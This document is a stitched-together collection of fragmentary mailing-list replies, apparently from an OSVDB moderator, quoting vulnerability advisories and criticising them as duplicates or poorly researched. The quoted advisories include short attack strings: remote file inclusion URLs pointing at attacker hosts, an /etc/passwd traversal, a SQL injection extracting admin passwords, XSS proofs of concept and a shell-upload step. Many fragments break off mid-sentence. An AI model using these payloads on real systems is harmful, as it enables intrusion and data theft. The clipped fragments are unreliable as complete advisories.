: Real player resource exhaustion Vulnerability
: Real Networks Real Player is prone to Resource exhaustion vulnerability.
: When processing specially crafted HTML file, Real Player uses a value
: from the file to control a loop operation. Real player fails to validate
: the value before usin
CVE-2008-1609 & CVE-2006-7128
same issue, 4.0 RC1 and RC2. really guys? at least check VDBs before you
publish.
: Vulnerability ID: HTB22666
: Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Did you check the vendor's page?
This page last updated on : May 20, 2006
: Vulnerability ID: HTB22695
: Reference: http://www.htbridge.ch/advisory/xss_in_compactcms.html
: Product: CompactCMS
: Vendor: compactcms.nl ( http://www.compactcms.nl/ )
: Vulnerable Version: 1.4.1
: Vendor Notification: 04 November 2010
: Vulnerability Type: XSS (Cross Site Scripting)
: Sta
: New eVuln Advisory:
: Cookie Auth Bypass in Hot Links SQL
: http://evuln.com/vulns/140/summary.html
Already discovered and disclosed:
http://www.exploit-db.com/exploits/8684/
Published: 2009-05-14
: ---[ Summary ]-
: eVuln ID: EV0140
: Software:
Seems to be a duplicate of:
http://www.exploit-db.com/exploits/9237/
CVE: 2009-3219 OSVDB-ID: 56336
From 2009-07-23
yes?
On Tue, 16 Nov 2010, eidelwe...@windowslive.com wrote:
:
: AWCM v2.2 Auth Bypass Vulnerabilities
: ###
: Multiple vulnerabilities were found in web application chCounter <= 3.1.3.
:
: Author:
: - Matias Fontanini(mfontan...@cert.unlp.edu.ar).
:
: Requirements:
: - Downloads must be enabled(this is not default).
: - magic_quotes off.
: - Access to administration site
That is a lot of prerequisite
Date: 2010-04-03
http://packetstorm.crazydog.pt/1004-exploits/wolfcms-xsrf.txt
This looks to be the same finding in 0.6.0a
On Thu, 25 Nov 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22681
: Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_wolf_cms.html
: Product: Wolf CMS
:
Nice try.. republishing old findings again?
On Thu, 30 Dec 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22750
: Reference: http://www.htbridge.ch/advisory/sql_injection_in_lightneasy.html
: Product: LightNEasy
: The vulnerability exists due to failure in the "/LightNEasy.php" script
Not only was this previously discovered, you don't seem to understand the
variables:
On Thu, 30 Dec 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22754
: Reference: http://www.htbridge.ch/advisory/sql_injection_in_lightneasy_1.html
: Product: LightNEasy
:
: Vulnerability Details:
:
: Vulnerability ID: HTB22770
: Reference: http://www.htbridge.ch/advisory/sql_injection_in_phpmysport.html
: Vulnerability Details:
: The vulnerability exists due to failure in the "/index.php" script to
: properly sanitize user-supplied input in "v1" variable. Attacker can
: alter queries to
: Vulnerability ID: HTB22776
: Reference:
http://www.htbridge.ch/advisory/stored_xss_vulnerability_in_diafan_cms.html
: Product: diafan.CMS
: Vulnerability Details:
: User can execute arbitrary JavaScript code within the vulnerable application.
:
: The vulnerability exists due to failure in the
: Vulnerability ID: HTB22827
: Reference:
http://www.htbridge.ch/advisory/file_content_disclosure_in_wikipad.html
: Vulnerability Type: File Content Disclosure
: Risk level: Low
: Vulnerability Details:
: The vulnerability exists due to failure in the "/pages.php" script to
properly sanitize
On Thu, 20 Jan 2011, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22785
: Reference: http://www.htbridge.ch/advisory/sql_injection_in_pixie.html
:
: Vulnerability Details:
: The vulnerability exists due to failure in the "/index.php" script to
properly sanitize user-supplied input in "ref
Seriously?
This was reported in Jul 2001 by Hiromitsu Takagi, and assigned
CVE-2001-1161.
http://seclists.org/bugtraq/2001/Jul/22
Would you please:
a) check to see if a vulnerability has been published
b) test current software
c) include the full name of the product you are testing
"IBM Lotu
Discovered 2008-01-21, covered by CVE-2008-0422 / OSVDB 40960.
On Sat, 5 Jun 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22398
: Reference:
http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_boastmachine.html
: Product: boastMachine
: Vendor: Kailash Nadh
: Vulnerable V
On Sat, 12 Jun 2010, i...@securitylab.ir wrote:
: #
: # Securitylab.ir
: #
: # Application Info:
: # Name: Cherokee Web Server
: # Version: 0.5.3
: # Download:
Hello,
For both of your WebDB advisories, you say:
: Product: WebDB
: Vendor: Lois Software
: Vulnerable Version: 2.0a and Probably Prior Versions
: Status: Fixed by Vendor
: Risk level: High
: Solution: There is no need for anybody to upgrade to the latest version.
Why is there no need for
Already discovered 2010-05-12 (CVE-2010-1994) by Secunia and possibly
Holistic. Original advisories:
http://secunia.com/secunia_research/2010-56
http://holisticinfosec.org/content/view/141/45/
On Tue, 29 Jun 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22444
: Reference:
http://
This was already disclosed on 2008-01-06 (CVE-2008-4612) in version 4.0.
On Tue, 29 Jun 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22442
: Reference:
http://www.htbridge.ch/advisory/xss_vulnerability_in_portalapp_1.html
: Product: PortalApp
: Vendor: Latek
: Vulnerable Version: 4
: Vulnerability ID: HTB22445
: Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_cruxcms.html
: Product: CruxCMS
: Vendor: CruxSoftware
: Vulnerable Version: 3.00 and Probably Prior Versions
: Risk level: Medium
: Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing
: Product: WebPress
: Vendor: YWP ( http://www.goywp.com/ )
: Vulnerable Version: Current at 01.07.2010 and Probably Prior Versions
The vendor web page has a demo feature, that is powered by "YWP 13.00.04".
Creating a demo via their site, the changelog shows "05.05.2010 - Released
version 13.0
: Vulnerability ID: HTB22489
: Reference:
http://www.htbridge.ch/advisory/xss_vulnerability_in_theeta_cms_2.html
: Vendor: MN Tech Solutions
: Vulnerable Version: 0.0
: The vulnerability exists due to failure in the "forum.php" script to
: properly sanitize user-supplied input in "forum" variab
: Product: Eden Platform
: Vendor: Preation ( http://www.preation.com/ )
: Vulnerable Version: Current at 27.07.2010 and Probably Prior Versions
: Risk level: Medium
The vendor web page has a free trial feature, with no obvious version.
Your version of 01.07.2010 appears to be something you de
: Vulnerability ID: HTB22576
: Reference:
http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_tcms_2.html
: Vulnerability ID: HTB22571
: Reference:
http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_tcms.html
Aside switching from GET to a POST request, what is the differ
: 1. OVERVIEW
:
: The QtWeb Browser application is vulnerable to Insecure DLL Hijacking
: Vulnerability. Similar terms that describe this vulnerability have been
: come up with Remote Binary Planting, and Insecure DLL
: Loading/Injection/Hijacking/Preloading.
: 3. VULNERABILITY DESCRIPTION
:
: Vulnerability ID: HTB22584
: Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_compucms.html
: Product: CompuCMS
: Vendor: CompuSoft A/S ( http://www.compusoft.dk/ )
: Vulnerable Version: Current at 06.08.2010 and Probably Prior Versions
Once again, you assign a "version" based
: Vulnerability ID: HTB22564
: Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_auto_cms.html
: Product: Auto CMS
: Vendor: Roberto Aleman ( http://ventics.com/autocms/ )
: Vulnerable Version: 1.6 and Probably Prior Versions
: Vulnerability Type: XSS (Cross Site Scripting)
As an
it would really require
something like a CSRF.
Fortunately for attackers, it seems you guys missed the CSRF in this
application that HolisticInfoSec found:
http://holisticinfosec.org/content/view/154/45/
Keep up the solid research guys.
- security curmudgeon
ious actions.
Demonstrating a few of those vectors would be more helpful.
- security curmudgeon
: Vulnerability ID: HTB22620
: Reference:
http://www.htbridge.ch/advisory/xss_vulnerability_in_lantern_cms.html
: Product: Lantern CMS
: Vendor: Lantern ( http://www.lanterncms.com/www/html/7-home-page.asp )
: Vulnerable Version: Current at 18.09.2010 and Probably Prior Versions
From the vendo
: Vulnerability ID: HTB22618
: Reference:
http://www.htbridge.ch/advisory/xss_vulnerability_in_expression_cms_1.html
: Product: Expression
: Vendor: Backbone Technology ( http://www.backbonetechnology.com )
: Vulnerable Version: Current at 18.09.2010 and Probably Prior Versions
How do you know
> Quick clarification on several points based on emails that I've received:
>
> 1) We did notify Apache before going public. ISS X-Force emailed
> Apache in the morning at 9:44am regarding this Advisory. We waited until
> the afternoon before sending to Bugtraq for approval and finally r
-- Forwarded message --
From: Rick Elnor
To: [EMAIL PROTECTED]
Date: Sun, 29 Jan 2006 10:11:08 -0800
Subject: [OSVDB Mods] [Change Request] 22693: Etomite todo.inc.php cij Variable
Arbitrary Command Execution
Hello,
I am Rick Elnor, the Etomite CMS security expert and owner
: http://www.activecampaign.com/support/
:
: Version : 1-2-All KB
:* KnowledgeBuilder KB
:* iSalient KB
:* SupportTrio KB
:* visualEdit KB
:* General KB
:
: This is a support-faq script. The questions is asked. But this a script
: hi
: VENDOR :http://nucleuscms.org/
: BY : s3rv3r_hack3r (hackerz.ir admin)
: bug:
: nucleus3.22/nucleus/plugins/skinfiles/index.php = include($DIR_LIBS .
'PLUGINADMIN.php');
: Exploit:
: http://victim/nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://shell
I haven't examined the source cod
: Discovered by: Qex
: Date: 25 April 2006
:
: /member.php?action=viewpro&member=[XSS]
Can you confirm this? Doing a quick grep of the 1.0.2 source code finds no
occurrence of "viewpro" at all. The line above also happens to be exactly
the same as your DevBB disclosure, suggesting this may be
:
: By: Mr-X
: Email: [EMAIL PROTECTED]
: Subject: modules name(Sections)SQL Injection
:
:
: example:-
: /modules.php?name=Surveys&op=results&pollID=8&mode=&order=&thold=[SQL]
What product is this in? Searching for "modules name sections" is not that
h
: --
: found by: BoNy-m
: Site: http://www.alshmokh.com
: E-mail: [EMAIL PROTECTED]
: --
:
: Search:
: allinurl:tseekdir.cgi
:
: example:
: /tseekdir.cgi?location=/etc/passwd%00
: /tseekdir.cgi?id=1055&location=/etc/passwd%00
: /tsee
On Tue, 13 Jun 2006, [EMAIL PROTECTED] wrote:
:
http://[SITE]/default.asp?mod=search&type=simple&q=%27+union+select+1%2Cadmin_password%2C3%2C4+from+admin_users+%27+&cmdSearch=Search
:
: credits: EntriKa & The_BeKiR & erne
Which "Ashop" is this?
AShop Software
www.ashopsoftware.com/
Ashop Sho
: ##
: # Fusion Polls (xtrphome) Remote File Inclusion
: ##
Is this Fusion Polls:
Fusion Poll 1.1
http://www.fusionphp.net/
http://www.ezgoal.com/channels/developer/f.asp?f=319691
Fusion Poll
: Have you ever nmap-ed a network with AS/400s? If you have, you probably
: know that doing so will, in at least half the cases, either crash the
: box, hang up one or more services, or really confuse the IP stack to the
: point that the box almost screeches to a halt.
This is frequently obse
: We frequently see requests for contact on this mailing list. Readers
: are encouraged to ensure that their software vendors are aware of the
: following documents, which have more specific guidelines for vendors to
: establish. Because these documents have been co-authored by major
: organ
On Sat, 20 Dec 2008, ad...@bugreport.ir wrote:
: +-->Cross Site Scripting (XSS). Reflected XSS attack in "index.php" in "q"
: parameter.
:
: POC:
:
http://[URL]/chicomas/index.php?q=";alert(/www.BugReport.ir/.source)
This was disclosed on May 5th [1] by Hadi Kiamarsi and was assigned BID
2902
sly than Oracle's.
Any input from either side to help clarify?
- security curmudgeon
p.s. Same exact question and CVSS2 scores for SYS.DBMS_AQJMS_INTERNAL
(DB15), CVE-2008-1821, same Oracle CPU.
Hello Assurent & Oracle,
On Tue, 13 Jan 2009, vr-subscription-nore...@assurent.com wrote:
: Oracle BEA WebLogic Server Apache Connector Buffer Overflow
:
: Reference: http://www.bea.com/weblogic/server/
:
: 2. Vulnerability Summary
:
: A remotely exploitable vulnerability has been discovered
iDefense, CVE or Oracle;
The two iDefense advisories present a bit of confusion over the CVE
assignments and number of vulnerabilities. There appear to be two
vulnerabilities (login.php and common.php) that may have 3 CVE numbers
assigned. Could anyone clarify?
First advisory, mail list post
(Note the date, late reply I know..)
On Tue, 29 Jul 2008, Andy Davis wrote:
: The IOS FTP server vulnerabilities were published in an advisory by
: Cisco in May 2007. The FTP server does not run by default, it is not
: widely used and has since been removed from new versions of IOS.
: Therefo
: ZDI-09-007: Apple QuickTime Cinepak Codec MDAT Heap Corruption
: Vulnerability
: http://www.zerodayinitiative.com/advisories/ZDI-09-007
: January 21, 2009
:
: -- CVE ID:
: CVE-2009-2006
CVE-2009-0006 perhaps?
On Fri, 15 Aug 2008, r3d.w...@yahoo.com wrote:
(pardon the late reply)
: #!user/bin/python
: # -*- coding: cp1256 -*-
:
#
: munky-bliki Lfi
: Oracle Database Buffer Overflow in SYS.OLAPIMPL_T.ODCITABLESTART
: Risk Level: High
: Oracle Database Server provides the SYS.OLAPIMPL_T package. This package
: contains the procedure ODCITABLESTART which is vulnerable to buffer
: overflow attacks. Impact: By default SYS.OLAPIMPL_T has EXEC
: Discovery by :- Sw33t h4cK3r
: powered by : saphp
:
:
: Exploit :
: http://Example.com/story/showcat.php?forumid=[SQL]
Discovered 2005-10-24
http://archives.neohapsis.com/archives/bugtraq/2005-10/0275.html
Discovered 2006-04-12
http://archives.neohapsis.com/archiv
: Discovery by:- Sw33t h4cK3r
:
: POWERED BY: SaphpLesson2.0
: --
:
: Exploit :
: http://Example.com/show/show.php?lessid=[SQL]
Discovered 2006-05-27
http://archives.neohapsis.com/archives/bugtraq/2006-05/0610.html
: Olmek Var$a Kaderde Dert Ekleme Derdine Team :)
: Portal:Friend Script 2.5 - 2.4 Remote File İnclude Vulnerable
: Author:Yollubunlar
: http://yollubunlar.Org
:
: Exploit:script_path/inc/tell_a_friend.inc.php?script_root=Sh3ll.txt?
This was discovered on 2005-03-07 and reported for version 2.7
: MEFISTO PreSents...
.. something already disclosed before!
: Script: RIG Image Gallery
: Script Download: http://sourceforge.net/project/showfiles.php?group_id=54367
:
: Contact: ilker Kandemir
:
: Exploit: check_entry.php?dir_abs_src=http://attacker.php?
2006-06-20
http://cve.mitre.org/c
: # Phorm v3.0 Remote File Upload Vulnerability
:
: # ilker kandemir
:
:
: # Exploit: http://[site]/[phorm_path]/lib/fileupload.php [+]=>>
upload your shell.php
:
: # http://[site]/[phorm_path]/files/phpshell.php
This also won't work unless an administrator makes changes to
: BellaBiblio Admin Login Bypass
:
: SCRIPT: BellaBiblio
:
: DOWNLOAD: http://www.jemjabella.co.uk/scripts/BellaBiblio.zip
:
: AUTHOR: ilker kandemir
:
: Bug in;(admin.php)
: if (isset($_COOKIE['bellabiblio'])) {
: if ($_COOKIE['bellabiblio'] == md5($admin_name.$admin_pass.$secret)) {
:
On Mon, 13 Apr 2009, mariani...@hotmail.com wrote:
: Discovered by Sirdarckcat from elhacker.net
By 'discovered', you mean 'copied from the disclosure in September 2006'
right?
CVE-2006-4605 through CVE-2006-4608.
: Title: Elkapax CMS Multiple Vulnerabilities
:
: Vendor: www.elkapax.com
: Fix: N/A
: Elkapax is a CMS producer in Iran. Search page in Elkapax CMS
:
: product are vulnerable to XSS vulnerability.
:
: Cross Site Scripting vulnerability in Search page in "q" parameter.
:
: http://example.co